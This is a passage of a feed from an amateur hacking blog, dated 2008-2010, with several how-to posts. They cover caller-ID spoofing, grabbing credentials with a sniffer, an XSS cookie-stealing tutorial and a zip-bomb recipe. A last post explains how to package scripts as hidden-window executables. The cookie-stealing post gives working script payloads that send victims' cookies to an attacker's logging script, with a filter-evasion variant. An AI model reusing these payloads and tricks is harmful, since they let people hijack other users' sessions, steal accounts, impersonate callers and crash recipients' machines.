So why waiting fo. Start pranking your friends</description><link>http://blackcoder-hiren.blogspot.com/2010/01/send-anonymous-mails-to-anyone.html</link><author>noreply@blogger.com (Hiren)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4830192571203385049.post-6700267027602588393</guid><pubDate>Sun, 31 Jan 2010 06:12:00 +0000</pubDate><atom:updated>2010-01-30T22:12:39.379-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Call Spoofing</category><category domain="http://www.blogger.com/atom/ns#">Fun With Hacking</category><title>Call Spoofing</title><description>Here is the trick.... &lt;br /&gt;
just dial -&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: red;&quot;&gt;+239 299328&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
then wait for a beep after that dial the number you want to display in your friends number with the prefix 91 and then again wait for next beep, after that dial the number which you wanna call … everything done, and call will get connected&lt;br /&gt;
&lt;br /&gt;
or else use this format –&lt;br /&gt;
+239 299328 &lt;strong&gt;p&lt;/strong&gt; 919895012345 &lt;strong&gt;p&lt;/strong&gt; 919895000000&lt;br /&gt;
&lt;br /&gt;
here it will display the no: 919895012345&lt;br /&gt;
and make call to this no: 919895000000&lt;br /&gt;
and hope u know “&lt;strong&gt;p&lt;/strong&gt;”&lt;br /&gt;
just press star key 3 times “&lt;strong&gt;p&lt;/strong&gt;” will appear&lt;br /&gt;
In Iphones … instead of &lt;strong&gt;p&lt;/strong&gt; a comma &lt;strong&gt;,&lt;/strong&gt; is used&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;text-decoration: underline;&quot;&gt;&lt;strong&gt;NOTE&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;
* To spoof your phone will call an international number , international rates will apply&lt;br /&gt;
* Number to call should start with the 91 prefix&lt;br /&gt;
* Dialing the spoof no: takes around 20 seconds&lt;br /&gt;
* Some one told me that this spoof work for all country’s , i am not sure about that but its working in india&lt;br /&gt;
* Even if you try to make miss call you will loose money , since you are dialing an international no:&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;&lt;span style=&quot;text-decoration: underline;&quot;&gt;DISCLAIMER&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;
* Do this at your own risk. I am not responsible for any damage caused&lt;br /&gt;
* Just shared with you guys coz sharing is caring.. dont call 100 and say “bomb”</description><link>http://blackcoder-hiren.blogspot.com/2010/01/call-spoofing.html</link><author>noreply@blogger.com (Hiren)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4830192571203385049.post-9102026278886113344</guid><pubDate>Wed, 27 Jan 2010 14:27:00 +0000</pubDate><atom:updated>2010-01-27T06:27:22.113-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Fun With Hacking</category><category domain="http://www.blogger.com/atom/ns#">High Level Hacking</category><title>Packet Sniffing [Hacking a Hacker]</title><description>&lt;span style=&quot;font-size: small;&quot;&gt;HERE I WILL TELL U HOW CAN U HACK AN HACKER&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;MOST PEOPLE{HACKERS} FOR ID HACKING USE REMOTE KEYLOGGERS&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;so I WILL TELL U HOW TO GET THERE PASSWORD USING PACKET SNIFFING&lt;/span&gt;&lt;i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/i&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;STEP-1&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
DOWNLOAD BINTEXT FROM HERE{{its a text extraxtor but it also work as a packet sniffer}}&lt;br /&gt;
&lt;a href=&quot;javascript:void(0);&quot; onclick=&quot;_linkInterstitial(&#39;http://www.softpedia.com/progDownload/Bi\74wbr\76nText-Download-138176.html&#39;); return false;&quot; target=&quot;_blank&quot;&gt;http://www.softpedia.com/progDo&lt;wbr&gt;&lt;/wbr&gt;wnload/BinText-Download-138176.html&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;STEP-2&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;RUN IT AND OPEN THE REMOTE KEYLOGGER AND CLICK &quot;GO&quot;&lt;br /&gt;
SEE BELOW PICTURE&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://lh6.ggpht.com/_e0IusKP8t6I/S2AHN8NCwrI/AAAAAAAAAFI/RD5Av41eZ-o/SNIFF2.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;464&quot; src=&quot;http://lh6.ggpht.com/_e0IusKP8t6I/S2AHN8NCwrI/AAAAAAAAAFI/RD5Av41eZ-o/SNIFF2.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;STEP-3&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;NOW WE HAVE TO FIND HIS ID AND PASSWORD&lt;br /&gt;
SEE BELOW PIC&lt;br /&gt;
&lt;b&gt;AT &quot;WRITE&quot; PLACE&lt;/b&gt; WRITE &lt;b&gt;GMAIL&lt;/b&gt; OR &lt;b&gt;YAHOO&lt;/b&gt; OR &lt;b&gt;@&lt;/b&gt; AND CLICK &quot;FIND&quot;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://lh3.ggpht.com/_e0IusKP8t6I/S2AHNnAEd8I/AAAAAAAAAFE/MMu5ktE5vfk/SNIFF1.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;458&quot; src=&quot;http://lh3.ggpht.com/_e0IusKP8t6I/S2AHNnAEd8I/AAAAAAAAAFE/MMu5ktE5vfk/SNIFF1.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;STEP-4&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;VOILAAAAA U GET HIS ID AND PASSWORD OPEN HIS MAIL AND FIND LOST OF PASSWORD AND ID THAT HE HAS STOLEN&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;STEP-5&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;U CAN ALSO FIND LOTS OF PASSWORD BY GOING TO YOUTUBE AND FIND FAKE PROGRAMMS WHICH CONTAIN VIRUS AND SCANNING WITH THIS APP&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;STEP-6&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;U HACKED AN HACKER&lt;br /&gt;
&lt;br /&gt;
THANXX FOR READING&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;NOTE&lt;/b&gt;&lt;/span&gt; THIS IS ONLY FOR UNCRYPTED SERVERS FOR STOLING FROM.... CRYPTED ONES IS HARD BUT CAN BE DONE THROUGH SNIFFPASS&lt;i&gt;...&lt;br /&gt;
&lt;/i&gt;</description><link>http://blackcoder-hiren.blogspot.com/2010/01/packet-sniffing-hacking-hacker.html</link><author>noreply@blogger.com (Hiren)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://lh6.ggpht.com/_e0IusKP8t6I/S2AHN8NCwrI/AAAAAAAAAFI/RD5Av41eZ-o/s72-c/SNIFF2.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4830192571203385049.post-4449334138439230746</guid><pubDate>Tue, 19 May 2009 11:49:00 +0000</pubDate><atom:updated>2010-01-26T20:21:19.477-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking With IP Address</category><title>Fine IP Address of Any Website Using A Simple Batch File</title><description>Find IP Address Of any Website Using A Batch File...&lt;br /&gt;
&lt;br /&gt;
Just Copy This code below and paste it in notepad&lt;br /&gt;
then save it as &quot;anyname.bat&quot;... thts it.. now run it..&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://img32.imageshack.us/img32/8760/ipfinder.jpg&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;200&quot; src=&quot;http://img32.imageshack.us/img32/8760/ipfinder.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-weight: bold;&quot;&gt;Click On Above Image to Enlarge It...&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;@title IP Finder - Created By BlackCoder &amp;amp; color F1&lt;br /&gt;
:Coding&lt;br /&gt;
@cls&lt;br /&gt;
@echo off &amp;amp; break off &amp;amp; @setlocal enabledelayedexpansion&lt;br /&gt;
@echo.&lt;br /&gt;
@echo ³³³³³³³³³³³³³³³³³ÉÍÍÍÍÍÍÍÍÍÍÍ»³³³³³³³³³³³³³³³³³&lt;br /&gt;
@echo ³³³³³³³³³³³³³³³³³º IP Finder º³³³³³³³³³³³³³³³³³&lt;br /&gt;
@echo ³³³³³³³³³³³³³³³³³ÈÍÍÍÍÍÍÍÍÍÍÍ¼³³³³³³³³³³³³³³³³³&lt;br /&gt;
@echo.&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
@set /p Website=Type Website URL Here :&lt;br /&gt;
@for /f &quot;tokens=3&quot; %%Z in (&#39;ping %Website%^| find &quot;[&quot;&#39;) do (&lt;br /&gt;
@for /f &quot;tokens=* delims=&quot; %%J in (&quot;%%Z&quot;) do (&lt;br /&gt;
@set ip=%%J &amp;amp; @set ip=!ip:[=!&lt;br /&gt;
@set ip=!ip:]=! &amp;amp; @set ip_Website=!ip!&lt;br /&gt;
)&lt;br /&gt;
)&lt;br /&gt;
@cls &amp;amp; @echo. &amp;amp; @echo É==========»&lt;br /&gt;
@echo ºµ²²²²²²²²²º &amp;amp; @echo È==========¼&lt;br /&gt;
@ping localhost -n 1 -w 30000 &amp;gt; nul&lt;br /&gt;
@cls &amp;amp; @echo. &amp;amp; @echo É==========»&lt;br /&gt;
@echo º²µ²²²²²²²²º &amp;amp; @echo È==========¼&lt;br /&gt;
@ping localhost -n 1 -w 30000 &amp;gt; nul&lt;br /&gt;
@cls &amp;amp; @echo. &amp;amp; @echo É==========»&lt;br /&gt;
@echo º²²µ²²²²²²²º &amp;amp; @echo È==========¼&lt;br /&gt;
@ping localhost -n 1 -w 30000 &amp;gt; nul&lt;br /&gt;
@cls &amp;amp; @echo. &amp;amp; @echo É==========»&lt;br /&gt;
@echo º²²²µ²²²²²²º &amp;amp; @echo È==========¼&lt;br /&gt;
@ping localhost -n 1 -w 30000 &amp;gt; nul&lt;br /&gt;
@cls &amp;amp; @echo. &amp;amp; @echo É==========»&lt;br /&gt;
@echo º²²²²µ²²²²²º &amp;amp; @echo È==========¼&lt;br /&gt;
@ping localhost -n 1 -w 30000 &amp;gt; nul&lt;br /&gt;
@cls &amp;amp; @echo. &amp;amp; @echo É==========»&lt;br /&gt;
@echo º²²²²²µ²²²²º &amp;amp; @echo È==========¼&lt;br /&gt;
@ping localhost -n 1 -w 30000 &amp;gt; nul&lt;br /&gt;
@cls &amp;amp; @echo. &amp;amp; @echo É==========»&lt;br /&gt;
@echo º²²²²²²µ²²²º &amp;amp; @echo È==========¼&lt;br /&gt;
@ping localhost -n 1 -w 30000 &amp;gt; nul&lt;br /&gt;
@cls &amp;amp; @echo. &amp;amp; @echo É==========»&lt;br /&gt;
@echo º²²²²²²²µ²²º &amp;amp; @echo È==========¼&lt;br /&gt;
@ping localhost -n 1 -w 30000 &amp;gt; nul&lt;br /&gt;
@cls &amp;amp; @echo. &amp;amp; @echo É==========»&lt;br /&gt;
@echo º²²²²²²²²µ²º &amp;amp; @echo È==========¼&lt;br /&gt;
@ping localhost -n 1 -w 30000 &amp;gt; nul&lt;br /&gt;
@cls &amp;amp; @echo. &amp;amp; @echo É==========»&lt;br /&gt;
@echo º²²²²²²²²²µº &amp;amp; @echo È==========¼&lt;br /&gt;
@ping localhost -n 1 -w 30000 &amp;gt; nul&lt;br /&gt;
@cls &amp;amp; @echo. &amp;amp; @echo É==========»&lt;br /&gt;
@echo ºµ²²²²²²²²²º &amp;amp; @echo È==========¼&lt;br /&gt;
@ping localhost -n 1 -w 30000 &amp;gt; nul&lt;br /&gt;
@cls &amp;amp; @echo. &amp;amp; @echo É==========»&lt;br /&gt;
@echo º²µ²²²²²²²²º &amp;amp; @echo È==========¼&lt;br /&gt;
@ping localhost -n 1 -w 30000 &amp;gt; nul&lt;br /&gt;
@cls &amp;amp; @echo. &amp;amp; @echo É==========»&lt;br /&gt;
@echo º²²µ²²²²²²²º &amp;amp; @echo È==========¼&lt;br /&gt;
@ping localhost -n 1 -w 30000 &amp;gt; nul&lt;br /&gt;
@cls &amp;amp; @echo. &amp;amp; @echo É==========»&lt;br /&gt;
@echo º²²²µ²²²²²²º &amp;amp; @echo È==========¼&lt;br /&gt;
@ping localhost -n 1 -w 30000 &amp;gt; nul&lt;br /&gt;
@cls &amp;amp; @echo. &amp;amp; @echo É==========»&lt;br /&gt;
@echo º²²²²µ²²²²²º &amp;amp; @echo È==========¼&lt;br /&gt;
@ping localhost -n 1 -w 30000 &amp;gt; nul&lt;br /&gt;
@cls &amp;amp; @echo. &amp;amp; @echo É==========»&lt;br /&gt;
@echo º²²²²²µ²²²²º &amp;amp; @echo È==========¼&lt;br /&gt;
@ping localhost -n 1 -w 30000 &amp;gt; nul&lt;br /&gt;
@cls &amp;amp; @echo. &amp;amp; @echo É==========»&lt;br /&gt;
@echo º²²²²²²µ²²²º &amp;amp; @echo È==========¼&lt;br /&gt;
@ping localhost -n 1 -w 30000 &amp;gt; nul&lt;br /&gt;
@cls &amp;amp; @echo. &amp;amp; @echo É==========»&lt;br /&gt;
@echo º²²²²²²²µ²²º &amp;amp; @echo È==========¼&lt;br /&gt;
@ping localhost -n 1 -w 30000 &amp;gt; nul&lt;br /&gt;
@cls &amp;amp; @echo. &amp;amp; @echo É==========»&lt;br /&gt;
@echo º²²²²²²²²µ²º &amp;amp; @echo È==========¼&lt;br /&gt;
@ping localhost -n 1 -w 30000 &amp;gt; nul&lt;br /&gt;
@cls &amp;amp; @echo. &amp;amp; @echo É==========»&lt;br /&gt;
@echo º²²²²²²²²²µº &amp;amp; @echo È==========¼&lt;br /&gt;
@ping localhost -n 1 -w 30000 &amp;gt; nul&lt;br /&gt;
@cls &amp;amp; @echo. &amp;amp; @echo É==========»&lt;br /&gt;
@echo ºµ²²²²²²²²²º &amp;amp; @echo È==========¼&lt;br /&gt;
@ping localhost -n 1 -w 30000 &amp;gt; nul&lt;br /&gt;
@cls &amp;amp; @echo. &amp;amp; @echo É==========»&lt;br /&gt;
@echo º²µ²²²²²²²²º &amp;amp; @echo È==========¼&lt;br /&gt;
@ping localhost -n 1 -w 30000 &amp;gt; nul&lt;br /&gt;
@cls &amp;amp; @echo. &amp;amp; @echo É==========»&lt;br /&gt;
@echo º²²µ²²²²²²²º &amp;amp; @echo È==========¼&lt;br /&gt;
@ping localhost -n 1 -w 30000 &amp;gt; nul&lt;br /&gt;
@cls &amp;amp; @echo. &amp;amp; @echo É==========»&lt;br /&gt;
@echo º²²²µ²²²²²²º &amp;amp; @echo È==========¼&lt;br /&gt;
@ping localhost -n 1 -w 30000 &amp;gt; nul&lt;br /&gt;
@cls &amp;amp; @echo. &amp;amp; @echo É==========»&lt;br /&gt;
@echo º²²²²µ²²²²²º &amp;amp; @echo È==========¼&lt;br /&gt;
@ping localhost -n 1 -w 30000 &amp;gt; nul&lt;br /&gt;
@cls &amp;amp; @echo. &amp;amp; @echo É==========»&lt;br /&gt;
@echo º²²²²²µ²²²²º &amp;amp; @echo È==========¼&lt;br /&gt;
@ping localhost -n 1 -w 30000 &amp;gt; nul&lt;br /&gt;
@cls &amp;amp; @echo. &amp;amp; @echo É==========»&lt;br /&gt;
@echo º²²²²²²µ²²²º &amp;amp; @echo È==========¼&lt;br /&gt;
@ping localhost -n 1 -w 30000 &amp;gt; nul&lt;br /&gt;
@cls &amp;amp; @echo. &amp;amp; @echo É==========»&lt;br /&gt;
@echo º²²²²²²²µ²²º &amp;amp; @echo È==========¼&lt;br /&gt;
@ping localhost -n 1 -w 30000 &amp;gt; nul&lt;br /&gt;
@cls &amp;amp; @echo. &amp;amp; @echo É==========»&lt;br /&gt;
@echo º²²²²²²²²µ²º &amp;amp; @echo È==========¼&lt;br /&gt;
@ping localhost -n 1 -w 30000 &amp;gt; nul&lt;br /&gt;
@cls &amp;amp; @echo. &amp;amp; @echo É==========»&lt;br /&gt;
@echo º²²²²²²²²²µº &amp;amp; @echo È==========¼&lt;br /&gt;
@ping localhost -n 1 -w 30000 &amp;gt; nul&lt;br /&gt;
@cls &amp;amp; @echo. &amp;amp; @echo Website Address: %Website%&lt;br /&gt;
@echo IP Address: %ip_Website% &amp;amp; @echo. &amp;amp; @echo Press { ENTER } to continue...&lt;br /&gt;
@pause &amp;gt; nul&lt;br /&gt;
goto Coding&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Enjoy...&lt;br /&gt;
Created By Blackcoder..&lt;br /&gt;
Thnx .. plz do comments...</description><link>http://blackcoder-hiren.blogspot.com/2009/05/fine-ip-address-of-any-website-using.html</link><author>noreply@blogger.com (Hiren)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4830192571203385049.post-8010953461473235555</guid><pubDate>Wed, 05 Nov 2008 06:34:00 +0000</pubDate><atom:updated>2010-01-26T20:22:18.010-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">High Level Hacking</category><title>--: Hacking Technique : Cookie Stealing :--</title><description>Cookiestealing is one of the most fundamental aspects of XSS (cross site scripting). &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Why is the cookie so important? Well, first you should see exactly what sort of &lt;br /&gt;
information is stored in a cookie. Go to a website that requires a login, and after &lt;br /&gt;
logging in erase everything in your address bar and type this line of code:&lt;br /&gt;
&lt;span style=&quot;font-weight: bold;&quot;&gt;Code:&lt;/span&gt; &lt;br /&gt;
&lt;span style=&quot;font-weight: bold;&quot;&gt; j&lt;/span&gt;&lt;b style=&quot;font-weight: bold;&quot;&gt;&lt;/b&gt;&lt;span style=&quot;font-weight: bold;&quot;&gt;alert(document.cookie)&lt;/span&gt; &lt;br /&gt;
&lt;br /&gt;
After you press enter, you should see a pop-up window with some information in it &lt;br /&gt;
(that is, if this site uses cookies). This is the data that is stored in your cookie. Here’s an&lt;br /&gt;
example of what might be in your cookie:&lt;br /&gt;
&lt;span style=&quot;font-weight: bold;&quot;&gt;Code:&lt;/span&gt; &lt;br /&gt;
username=CyberPhreak; password=ilikepie&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This is, of course, a very insecure cookie. &lt;br /&gt;
&lt;br /&gt;
If any sort of vulnerability was found that &lt;br /&gt;
allowed for someone to view other people’s cookies, every user account is possibly &lt;br /&gt;
compromised. &lt;br /&gt;
&lt;br /&gt;
You’ll be hard-pressed to find a site with cookies like these. However, it &lt;br /&gt;
is very common (unfortunately) to find sites with hashes of passwords within the cookie. &lt;br /&gt;
The reason that this is unfortunate is because hashes can be cracked, and oftentimes &lt;br /&gt;
just knowing the hash is enough.&lt;br /&gt;
Now you know why cookies are important; they usually have important information about the &lt;br /&gt;
user in them. But how would we go about getting or changing other users’ cookies? This is &lt;br /&gt;
the process of cookiestealing.&lt;br /&gt;
&lt;span style=&quot;font-weight: bold;&quot;&gt;Cookiestealing&lt;/span&gt; is a two-part process. You need to have a script to accept the cookie, and &lt;br /&gt;
you need to have a way of sending the cookie to your script. Writing the script to accept &lt;br /&gt;
the cookie is the easy part, whereas finding a way to send it to your script is the hard &lt;br /&gt;
part. I’ll show you an example of a pHp script that accepts cookies:&lt;br /&gt;
&lt;span style=&quot;font-weight: bold;&quot;&gt;Code:&lt;/span&gt; &lt;br /&gt;
&lt;br /&gt;
And there you have it, a simple&lt;span style=&quot;font-weight: bold;&quot;&gt; cookiestealer&lt;/span&gt;. The way this script works is that it accepts &lt;br /&gt;
the cookie when it is passed as a variable, in this case ‘cookie’ in the URL, and then &lt;br /&gt;
saves it to a file called ‘log.txt’. For example:&lt;br /&gt;
Code: &lt;br /&gt;
&lt;a href=&quot;http://yoursite.com/steal.php?cookie=steal.php&quot; style=&quot;font-weight: bold;&quot; target=&quot;_blank&quot;&gt;http://yoursite.com/steal.php?cookie=steal.php&lt;/a&gt; is the filename of the script we just wrote, ? lets the script know that we are &lt;br /&gt;
going to pass some variables to it, and after that we can set cookie equal to whatever &lt;br /&gt;
we want, but what we want to do is set cookie equal to the cookie from the site. This &lt;br /&gt;
is the second and harder part of the cookiestealer.&lt;br /&gt;
Most websites apply some sort of filter to input, so that you can’t directly insert your &lt;br /&gt;
own code. XSS deals with finding exploits within filters, allowing you to put your own &lt;br /&gt;
code into a website. This might sound difficult, and in most cases it’s not easy, but &lt;br /&gt;
it can be very simple.&lt;br /&gt;
Any website that allows you to post text potentially allows you to insert your own code &lt;br /&gt;
into the website. Some examples of these types of sites are forums, guestbooks, any site &lt;br /&gt;
with a “member profile”, etc. &lt;br /&gt;
&lt;br /&gt;
And any of these sites that have users who log in also &lt;br /&gt;
probably use cookies. Now you know what sort of sites might be vulnerable to &lt;br /&gt;
cookiestealing.&lt;br /&gt;
Let’s assume that we have a website that someone made. This website has user login &lt;br /&gt;
capability as well as a guestbook. And let’s also assume that this website doesn’t have &lt;br /&gt;
any kind of filtering on what can be put into the guestbook. &lt;br /&gt;
&lt;br /&gt;
This means that you can &lt;br /&gt;
put HTML and Javascript directly into your post in the guestbook. I’ll give you an &lt;br /&gt;
example of some code that we could put into a guestbook post that would send the user’s &lt;br /&gt;
cookie to out script:&lt;br /&gt;
&lt;span style=&quot;font-weight: bold;&quot;&gt;Code:&lt;/span&gt; &lt;br /&gt;
&lt;script&gt;
document.location = ‘http://yoursite.com/steal.php?cookie=’ + document.cookie;
&lt;/script&gt;&lt;br /&gt;
Now whenever someone views the page that you posted this on, they will be redirected to &lt;br /&gt;
your script with their cookie from this site in the URL. If you were to look at log.txt &lt;br /&gt;
now, you’d see the cookies of whoever looked at that page.&lt;br /&gt;
But cookiestealing is never that easy. Let’s assume now that the administrator of this &lt;br /&gt;
site got smart, and decided to filter out script tags. Now you code doesn’t work, so &lt;br /&gt;
we have to try and evade the filter. In this instance, it’s easy enough:&lt;br /&gt;
&lt;span style=&quot;font-weight: bold;&quot;&gt;Code:&lt;/span&gt; &lt;br /&gt;
&lt;a href=&quot;http://www.blogger.com/%E2%80%9Dj%3Cstrong&quot;&gt;void(document.location=’http://yoursite.com/steal.php?cookie=’+ &lt;br /&gt;
document.cookie)”&amp;gt;Click Me&lt;/a&gt; &lt;br /&gt;
&lt;br /&gt;
In this case, when the user clicks on the link they will be sent to your stealer with their &lt;br /&gt;
cookie. Cookiestealing, as are all XSS attacks, is mostly about figuring out how to get  around filters.</description><link>http://blackcoder-hiren.blogspot.com/2008/11/hacking-technique-cookie-stealing.html</link><author>noreply@blogger.com (Hiren)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4830192571203385049.post-7530486847009178876</guid><pubDate>Wed, 05 Nov 2008 06:03:00 +0000</pubDate><atom:updated>2010-01-26T20:22:52.157-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Fun With Hacking</category><title>-: The ZIP of Death :-</title><description>This is a exploit of the compression algorithms to make a small zip that will extract into extream amounts their are more ways and better ones than this one but i will only show how to make a simple 1k = 1m ratio.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;1)&lt;/b&gt; Make a.txt file&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;2)&lt;/b&gt; Open and type the null character (alt + 255)&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;3)&lt;/b&gt; Press ctrl + a then ctrl + v a couple times to make some null bytes&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;4)&lt;/b&gt; If u have a hexeditor make the hex 00 for about 50 kilobytes.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;5)&lt;/b&gt; Now make several copies of a.txt and name accordinly&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;6)&lt;/b&gt; Open cmd.exe&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;7)&lt;/b&gt; Type copy /b *.txt b.txt&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;8)&lt;/b&gt; Now every copy is made into a super copy and repeat&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;9)&lt;/b&gt; Once you have a nice empty big text file like 1gb. Put it in a zip archive.&lt;br /&gt;
Because of the simple construction of the file,  1gb of null bytes.....!&lt;br /&gt;
&lt;br /&gt;
The zip is only 1 mb in size and can really annoy freinds.&lt;br /&gt;
For added fun hex edit the zip and you will see a bunch of hex 5555&lt;br /&gt;
&lt;br /&gt;
Just add some more and the file will expand amazingly&lt;br /&gt;
&lt;br /&gt;
Make sure to not open this after&lt;br /&gt;
&lt;br /&gt;
You can always create your zip of death from the command line in linux&lt;br /&gt;
dd if=/dev/zero bs=1000 count=1000000 | gzip &amp;gt; test.gz</description><link>http://blackcoder-hiren.blogspot.com/2008/11/zip-of-death.html</link><author>noreply@blogger.com (Hiren)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4830192571203385049.post-5380900998826345898</guid><pubDate>Mon, 03 Mar 2008 17:17:00 +0000</pubDate><atom:updated>2008-03-03T09:18:36.884-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Let&#39;s Start Hacking</category><title>Get An Account For Any Site Or Forum !!!</title><description>&lt;span class=&quot;postbody&quot;&gt;i Friends.&lt;br /&gt;&lt;br /&gt;I just came across with a site which gives you usernames and passwords for almost everysite.&lt;br /&gt;&lt;br /&gt;I thought of sharing it with you.So,just check it out.I am sure you will love it.&lt;br /&gt;&lt;br /&gt;The Site is&lt;br /&gt;&lt;a href=&quot;http://www.bugmenot.com/&quot; target=&quot;_blank&quot;&gt;http://www.bugmenot.com/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Just enter the address of the forum or any site you want to access and get the pass to enter.&lt;br /&gt; &lt;/span&gt;</description><link>http://blackcoder-hiren.blogspot.com/2008/03/get-account-for-any-site-or-forum.html</link><author>noreply@blogger.com (Hiren)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4830192571203385049.post-1345721833997752530</guid><pubDate>Mon, 03 Mar 2008 17:13:00 +0000</pubDate><atom:updated>2008-03-03T09:14:20.674-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Virus And Programming</category><title>To convert a .bat or a .vbs file into an executable .exe ..</title><description>&lt;span class=&quot;postbody&quot;&gt;To convert a .bat or a .vbs file into an executable .exe file without any software&lt;br /&gt;follow the step:-&lt;br /&gt;&lt;br /&gt;Step 1&lt;br /&gt;Navigate to C:\Windows\System32 and locate the file named IEXPRESS.EXE&lt;br /&gt;&lt;br /&gt;Step 2&lt;br /&gt;Double Click to launch IEXPRESS.EXE or just type &amp;amp; enter iexpress.exe in start&gt;run box.&lt;br /&gt;&lt;br /&gt;Step 3&lt;br /&gt;You will be presented with the initial welcome screen and be given two choices. Select “Create new Self Extraction Directive file.” Click Next.&lt;br /&gt;&lt;br /&gt;Step 4&lt;br /&gt;Next you will be presented with the Package Purpose screen. For our purposes select “Extract Files and run an installation command” and click the Next button.&lt;br /&gt;&lt;br /&gt;Step 5&lt;br /&gt;You will be presented with the Package Title screen, which will give you the opportunity to give your project a name. If you are so inclined give it a meaningful name. If like me you are never going to come back to this, name it whatever you want.&lt;br /&gt;&lt;br /&gt;Step 6&lt;br /&gt;You will next be presented with the Confirmation Prompt Screen. We would like the batch file to just be extracted and run so just choose “No Prompt” and click the Next Button.&lt;br /&gt;&lt;br /&gt;Step 7&lt;br /&gt;You are presented with the License Agreement window. If you don’t want your users to have to answer a prompt select “Do not display a license.”&lt;br /&gt;&lt;br /&gt;Step 8&lt;br /&gt;The Packaged Files window is where you will select your batch file (or .vbs). Click the Add button and browse to your desired file. Then click next.&lt;br /&gt;&lt;br /&gt;Step 9&lt;br /&gt;Here you are presented with a window titled Install Program to Launch. Use the drop down control next to “Install Program and choose the only option that will be present, the .bat or .vbs file that you chose in the previous window.&lt;br /&gt;&lt;br /&gt;Step 10&lt;br /&gt;The Show Window screen is next. I didn’t want my users to be prompted in any way so I chose Hidden. Click Next.&lt;br /&gt;&lt;br /&gt;Step 11&lt;br /&gt;No 